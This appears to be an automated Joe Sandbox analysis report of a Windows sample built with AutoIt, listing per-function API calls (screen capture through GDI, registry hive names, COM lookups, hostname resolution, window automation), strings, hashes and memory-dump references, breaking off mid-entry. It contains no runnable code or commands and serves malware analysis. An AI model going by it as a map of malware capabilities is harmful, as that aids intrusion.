                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 1296962147-4108050209
                                                                                                                                                  • Opcode ID: def0e58347c4409c250f55c9ee6cbbe1a63305509d680dc30ac648ae6a34dcd3
                                                                                                                                                  • Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
                                                                                                                                                  • Opcode Fuzzy Hash: def0e58347c4409c250f55c9ee6cbbe1a63305509d680dc30ac648ae6a34dcd3
                                                                                                                                                  • Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
                                                                                                                                                  APIs
                                                                                                                                                  • GetDC.USER32(00000000), ref: 0047738F
                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 004773A7
                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 004773B4
                                                                                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                                                                                                                                                  • SelectObject.GDI32(00000006,?), ref: 00477470
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00477479
                                                                                                                                                  • DeleteDC.GDI32(00000006), ref: 00477480
                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 0047748B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                  • String ID: (
                                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                                  • Opcode ID: 42b41ddd4b113a7f294a88d3ae7bdf7c915cf6e4ce284398e7230c733f28da6c
                                                                                                                                                  • Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
                                                                                                                                                  • Opcode Fuzzy Hash: 42b41ddd4b113a7f294a88d3ae7bdf7c915cf6e4ce284398e7230c733f28da6c
                                                                                                                                                  • Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                                                                                                                                                    • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                                                                                                                                                    • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                                                                                                                                                    • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                   • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                   • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                  • API String ID: 537147316-1018226102
                                                                                                                                                  • Opcode ID: 4174df05c1f75710156156201a577902b35b21e51bd75112bebbd34d4145220d
                                                                                                                                                  • Instruction ID: 136c1bde332718f4234bbb9892b60201bfb37e26dd96c6a9a3310cb901d73b7e
                                                                                                                                                  • Opcode Fuzzy Hash: 4174df05c1f75710156156201a577902b35b21e51bd75112bebbd34d4145220d
                                                                                                                                                  • Instruction Fuzzy Hash: 2C027D701083419FC714EF25C8419AFBBE5EF98318F54492FF486A72A2DB38D949CB5A
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00462D50
                                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                                                                                                                                                  • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                                                                                                                                                  • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                                                                                                                                                  • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                                                                                                                                                  • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                                                                                                                                                  • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                                                                                                                                                  • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                                                                                                                                                  • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00462F56
                                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                                                                                                                                                  • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                                                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3993528054-0
                                                                                                                                                  • Opcode ID: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                                                                                                  • Instruction ID: dec7b0e441c84a99d0ab23afc077d39fee676e6f9a2472c44709d087c22ecc3a
                                                                                                                                                  • Opcode Fuzzy Hash: 68d6ff921564c39c8709aecc737d134abe6a2587159ab4d14f70d8f79111516a
                                                                                                                                                  • Instruction Fuzzy Hash: AB71F670601A05BBEB219F54DD49FAABF64FF04314F10022BF615AA2E1D7FA5C10DB5A
                                                                                                                                                  APIs
                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 00AB2543
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB3090
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB30A2
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB30B4
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB30C6
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB30D8
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB30EA
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB30FC
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB310E
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB3120
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB3132
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB3144
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB3156
                                                                                                                                                    • Part of subcall function 00AB3073: _free.LIBCMT ref: 00AB3168
                                                                                                                                                  • _free.LIBCMT ref: 00AB2538
                                                                                                                                                    • Part of subcall function 00AB2096: HeapFree.KERNEL32(00000000,00000000,?,00AB3208,?,00000000,?,00000000,?,00AB322F,?,00000007,?,?,00AB2697,?), ref: 00AB20AC
                                                                                                                                                    • Part of subcall function 00AB2096: GetLastError.KERNEL32(?,?,00AB3208,?,00000000,?,00000000,?,00AB322F,?,00000007,?,?,00AB2697,?,?), ref: 00AB20BE
                                                                                                                                                  • _free.LIBCMT ref: 00AB255A
                                                                                                                                                  • _free.LIBCMT ref: 00AB256F
                                                                                                                                                  • _free.LIBCMT ref: 00AB257A
                                                                                                                                                  • _free.LIBCMT ref: 00AB259C
                                                                                                                                                  • _free.LIBCMT ref: 00AB25AF
                                                                                                                                                  • _free.LIBCMT ref: 00AB25BD
                                                                                                                                                  • _free.LIBCMT ref: 00AB25C8
                                                                                                                                                  • _free.LIBCMT ref: 00AB2600
                                                                                                                                                  • _free.LIBCMT ref: 00AB2607
                                                                                                                                                  • _free.LIBCMT ref: 00AB2624
                                                                                                                                                  • _free.LIBCMT ref: 00AB263C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                  • Opcode ID: 7f85e9110f571b389ebd9a649353c784751addab696c55771376cebf0ed54765
                                                                                                                                                  • Instruction ID: 0f1eb297560d834ce213920d78c36340422e024e1f466ce7c1e4046b9ba338c5
                                                                                                                                                  • Opcode Fuzzy Hash: 7f85e9110f571b389ebd9a649353c784751addab696c55771376cebf0ed54765
                                                                                                                                                  • Instruction Fuzzy Hash: 47314772A003059BEB31AB38D955BDAB7EDFB04351F10452BE45AD6263EA75AD80CB20
                                                                                                                                                  APIs
                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004788D7
                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00478904
                                                                                                                                                  • CoUninitialize.OLE32 ref: 0047890E
                                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                                                                                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                                                                                                                                  • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00478C35
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                  • String ID: ,,I
                                                                                                                                                  • API String ID: 2395222682-4163367948
                                                                                                                                                  • Opcode ID: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                                                                                  • Instruction ID: aabbb54c80bb5556d5779205c7c98f5c8569651e4766cb9ae3be61758569f7e0
                                                                                                                                                  • Opcode Fuzzy Hash: 86113d1df25df9381713289ea4cd204886f45ef52b39823f92184825a9a21490
                                                                                                                                                  • Instruction Fuzzy Hash: 33C138B1604305AFC700DF25C88896BB7E9FF89348F00896EF9899B251DB75ED05CB56
                                                                                                                                                  APIs
                                                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                  • API String ID: 3964851224-909552448
                                                                                                                                                  • Opcode ID: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
                                                                                                                                                  • Instruction ID: 987af29362f030b9785e67816bde092fa47ad23058dcaf1b7a905610e89cab94
                                                                                                                                                  • Opcode Fuzzy Hash: a4df75a5d1017b7a8f535d2451c159b81df183318fde1907aaf5dc5abb7e2787
                                                                                                                                                  • Instruction Fuzzy Hash: 3C4183312142598BCF60FF11D891AEF3760AF21308F94882BFE5517292D77C9D1ACB69
APIs
  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
  • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
• Instruction ID: 2e8e5f898991f968bbba2f693440f846553d5b5edaf37d24830f39f112612e90
• Opcode Fuzzy Hash: a38f690a41644a1ea6aaaa90d6ed946eea0a1c3052881e4aa48fec53c4da1104
• Instruction Fuzzy Hash: CE119370D5015979D720B662CC49EFF7B7CEB91B48F10042F7801A21D1EDB81D45C6BA
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 208665112-3771769585
• Opcode ID: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
• Instruction ID: ae08325a14d93a890b1fa528d308863361f072a57d3f479d6846efdaae1a579c
• Opcode Fuzzy Hash: 09d15450440633b0f7a2b62d0b119be12e95eec53dc4214b1ac8cb0b212af872
• Instruction Fuzzy Hash: BD11F331600114AFDB10AB70AC46EDE77ACEB41716F5405BFF44592191FF7889858B5A
APIs
• timeGetTime.WINMM ref: 00464F7A
  • Part of subcall function 0042049F: timeGetTime.WINMM(?,75C0B400,00410E7B), ref: 004204A3
• Sleep.KERNEL32(0000000A), ref: 00464FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
• SetActiveWindow.USER32 ref: 0046500B
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
• Sleep.KERNEL32(000000FA), ref: 00465043
• IsWindow.USER32 ref: 0046504F
• EndDialog.USER32(00000000), ref: 00465060
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
• Instruction ID: 17ca608856519cd1955488b4f204772d3e00e2da9bda675b1abbe090807247ff
• Opcode Fuzzy Hash: 8774e4f041890dbc2a91042b0544c15fbc059514b46ccdf9cc1dd7305ce15ae1
• Instruction Fuzzy Hash: A521A174200605BFEB505F60FC88F2A3BA9EB44749F25543EF102922B1EB758D549B6F
APIs
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
• CoInitialize.OLE32(00000000), ref: 0046D5EA
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
• SHGetDesktopFolder.SHELL32(?), ref: 0046D691
• CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
• CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
• _memset.LIBCMT ref: 0046D7E1
• SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
• CoTaskMemFree.OLE32(00000000), ref: 0046D847
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
• CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
• Opcode ID: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
• Instruction ID: f865a34610966cb3ccb6f29414af5a3955dc884533e4df89e7e1a7976a3b9bcc
• Opcode Fuzzy Hash: 1febc7807772f56294efd1fd13851000f7df353c646d9fdc6f6b769e470cf38e
• Instruction Fuzzy Hash: 39B11B75A00109AFDB04DFA5C888DAEBBB9FF48314F10846AF909EB261DB34ED45CB55
APIs
• GetDlgItem.USER32(?,00000001), ref: 0045C283
• GetWindowRect.USER32(00000000,?), ref: 0045C295
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
• GetDlgItem.USER32(?,00000002), ref: 0045C2FE
• GetWindowRect.USER32(00000000,?), ref: 0045C310
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
• GetDlgItem.USER32(?,000003E9), ref: 0045C372
• GetWindowRect.USER32(00000000,?), ref: 0045C383
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
• GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
• InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
• Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
• Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
• Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14
APIs
  • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
• KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
• DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
• DeleteObject.GDI32(00000000), ref: 0043BD1C
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
